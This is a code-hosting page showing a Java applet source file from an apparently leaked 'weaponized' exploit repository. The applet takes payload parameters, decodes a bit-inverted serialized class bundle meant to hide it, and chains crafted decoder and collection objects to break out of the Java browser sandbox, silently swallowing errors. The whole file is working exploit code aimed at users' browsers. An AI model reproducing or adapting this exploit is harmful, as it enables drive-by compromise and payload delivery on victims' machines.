hackedteam/vector-applet

View on GitHub
weaponized/src-exploit/x/XAppletW.java

Summary

Maintainability
A
1 hr
Test Coverage
package x;

import java.beans.Expression;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.util.ArrayList;

import javax.swing.JApplet;
import javax.swing.JList;
import javax.swing.SwingUtilities;

@SuppressWarnings("all")
public class XAppletW extends JApplet {

    private static final long serialVersionUID = 4268202609884012044L;

    @Override
    public void init() {
        // Parsing arguments.
        EP.pClass = getParameter("pClass");  
        EP.pJar = getParameter("pJar");
        EP.pBin = getParameter("pBin");
        int argCount = 1;
        String arg;
        ArrayList<String> args = new ArrayList<String>();
        while( (arg=getParameter("pArg"+argCount++)) != null ) {
            args.add(arg);
        }
        EP.pArgs = new String[args.size()];  
        args.toArray(EP.pArgs);
        EP.docBase = this.getDocumentBase().toString();
//        System.out.println("Hello "+ExploitParams.docBase);
        
        //Execute a job on the event-dispatching thread; creating this applet's GUI.
        try {
            SwingUtilities.invokeAndWait(new Runnable() {
                public void run() {      
                    try {
                        byte[] bytes = new byte[4096];
                        InputStream in = XAppletW.class.getResourceAsStream("classes.ser");
                        ByteArrayOutputStream out = new ByteArrayOutputStream();
                        int bytesRead;
                        while( (bytesRead = in.read(bytes)) != -1) {
                            out.write(bytes, 0, bytesRead);
                        }
                        in.close();
                        bytes = out.toByteArray();
                        for( int i=0; i<bytes.length; i++ ) {
                            bytes[i] = (byte) (bytes[i] ^ 255); // "Inverse bits encryption": Enough to hide
                        }
                        ByteArrayInputStream bin = new ByteArrayInputStream(bytes);
                        ObjectInputStream oin = new ObjectInputStream(bin);        
                        EC cl = (EC) oin.readObject();
                        //-------------------
                        in = XAppletW.class.getResourceAsStream("input.xml");
                        Object dec = new Expression(cl.getClass("x.MyXMLDecoder"),"new",new Object[] {in}).getValue();
                        Object iter = new Expression(cl.getClass("x.Context_close_Caller"),"create",new Object[] {dec}).getValue();
                        Object o = new Expression(cl.getClass("x.MyHashSet"),"new",new Object[] {iter}).getValue();
                        JList list = new JList();
                        list.setListData(new Object[] { o });
                        add(list);
                    } catch (Exception e) {
                        //e.printStackTrace();
                    }
                }
            });
        } catch (Exception e) {
            //e.printStackTrace();
        }
    }

}